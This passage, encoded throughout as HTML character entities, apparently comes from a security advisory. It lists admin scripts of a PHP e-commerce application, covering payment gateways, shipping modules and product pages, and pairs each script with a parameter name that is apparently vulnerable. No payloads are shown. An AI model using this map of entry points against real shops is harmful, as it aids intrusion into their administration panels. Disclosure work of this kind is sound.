;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#65;&#118;&#101;&#110;&#117;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#78;&#111;&#119;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#99;&#99;&#78;&#111;&#119;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#67;&#104;&#114;&#111;&#110;&#111;&#112;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#67;&#104;&#114;&#111;&#110;&#111;&#112;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#71;&#111;&#108;&#100;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#71;&#111;&#108;&#100;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#87;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#101;&#87;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#72;&#83;&#66;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#72;&#83;&#66;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#76;&#105;&#110;&#107;&#80;&#111;&#105;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#76;&#105;&#110;&#107;&#80;&#111;&#105;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#97;&#108;&#115;&#45;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#97;&#108;&#115;&#45;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#111;&#110;&#101;&#121;&#98;&#111;&#111;&#107;&#101;&#114;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#109;&#111;&#110;&#101;&#121;&#98;&#111;&#111;&#107;&#101;&#114;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#79;&#67;&#72;&#69;&#88;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#79;&#67;&#72;&#69;&#88;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#111;&#99;&#104;&#101;&#120;&#95;&#65;&#80;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#78;&#111;&#99;&#104;&#101;&#120;&#95;&#65;&#80;&#67;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#74;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#74;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#97;&#121;&#109;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#97;&#121;&#109;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#79;&#102;&#102;&#108;&#105;&#110;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#79;&#102;&#102;&#108;&#105;&#110;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#80;&#97;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#97;&#121;&#80;&#97;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#105;&#110;&#116;&#95;&#79;&#114;&#100;&#101;&#114;&#95;&#70;&#111;&#114;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#105;&#110;&#116;&#95;&#79;&#114;&#100;&#101;&#114;&#95;&#70;&#111;&#114;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#111;&#116;&#120;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#80;&#114;&#111;&#116;&#120;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#115;&#105;&#71;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#112;&#115;&#105;&#71;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#83;&#69;&#67;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#83;&#69;&#67;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#108;&#111;&#99;&#105;&#116;&#121;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#108;&#111;&#99;&#105;&#116;&#121;&#80;&#97;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#114;&#105;&#115;&#105;&#103;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#103;&#97;&#116;&#101;&#119;&#97;&#121;&#47;&#86;&#101;&#114;&#105;&#115;&#105;&#103;&#110;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#101;&#114;&#99;&#101;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#101;&#114;&#99;&#101;&#110;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#114;&#105;&#99;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#80;&#114;&#105;&#99;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#87;&#101;&#105;&#103;&#104;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#66;&#121;&#95;&#87;&#101;&#105;&#103;&#104;&#116;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#108;&#97;&#116;&#95;&#82;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#108;&#97;&#116;&#95;&#82;&#97;&#116;&#101;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#114;&#101;&#101;&#95;&#83;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#70;&#114;&#101;&#101;&#95;&#83;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#67;&#97;&#116;&#101;&#103;&#111;&#114;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#67;&#97;&#116;&#101;&#103;&#111;&#114;&#121;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#73;&#116;&#101;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#80;&#101;&#114;&#95;&#73;&#116;&#101;&#109;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#82;&#111;&#121;&#97;&#108;&#95;&#77;&#97;&#105;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#102;&#111;&#108;&#100;&#101;&#114;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#109;&#111;&#100;&#117;&#108;&#101;&#115;&#47;&#115;&#104;&#105;&#112;&#112;&#105;&#110;&#103;&#47;&#82;&#111;&#121;&#97;&#108;&#95;&#77;&#97;&#105;&#108;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#109;&#111;&#100;&#117;&#108;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#101;&#120;&#116;&#114;&#97;&#67;&#97;&#116;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#97;&#100;&#100;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#101;&#120;&#116;&#114;&#97;&#67;&#97;&#116;&#115;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#110;&#97;&#109;&#101;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#105;&#110;&#100;&#101;&#120;&#46;&#112;&#104;&#112;&#32;&#9;&#40;&#99;&#97;&#116;&#95;&#105;&#100;&#32;&#112;&#97;&#114;&#97;&#109;&#101;&#116;&#101;&#114;&#41;&#10;&#47;&#97;&#100;&#109;&#105;&#110;&#47;&#112;&#114;&#111;&#100;&#117;&#99;&#116;&#115;&#47;&#10